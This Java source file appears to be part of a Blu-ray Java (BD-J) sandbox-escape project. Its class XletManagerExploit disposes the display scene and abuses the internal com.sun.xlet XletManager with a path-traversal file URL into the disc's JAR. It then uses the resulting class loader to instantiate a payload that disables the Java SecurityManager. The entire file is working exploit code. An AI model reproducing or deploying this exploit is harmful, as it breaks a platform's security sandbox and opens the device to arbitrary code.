package org.bdj.sandbox;

import java.awt.Frame;
import org.havi.ui.HScene;
import org.havi.ui.HSceneFactory;

import com.sun.xlet.XletLifecycleHandler;
import com.sun.xlet.XletManager;

import java.net.URLClassLoader;

import org.bdj.Status;

public class XletManagerExploit {

    private static final String DUMMY_CLASS_NAME = "org.bdj.sandbox.Dummy";  
    private static final String PAYLOAD_CLASS_NAME = "org.bdj.sandbox.Payload";
    private static final String JAR_URL = "file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";
    
    public static void disposeWindow() {
        HScene hScene = HSceneFactory.getInstance().getDefaultHScene();
        Frame frame = (Frame) hScene.getParent();
        hScene.dispose();
        frame.dispose();
    }
    
    public static boolean trigger() throws Exception {
        
        //12.50 <= check so we don't dipose window
        System.getSecurityManager().checkPackageAccess("com.sun.xlet");
        
        Status.println("Disposing Window");
        
        disposeWindow();
        
        Status.println("Invoking createXlet");
        
        XletLifecycleHandler handler = XletManager.createXlet(
            DUMMY_CLASS_NAME,
            new String[]{ JAR_URL },
            new String[0]
        );
        
        Status.println("Getting ClassLoader");
        
        XletManager manager = (XletManager) handler;
        URLClassLoader urlClassLoader = (URLClassLoader) manager.getClassLoader();
        
        Status.println("Disabling SecurityManager");
        
        Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
        payloadClass.newInstance();
        
        //XletManager needs to be cleaned up, but we can just leave it I guess?
        
        return System.getSecurityManager() == null;
        
    }
  
}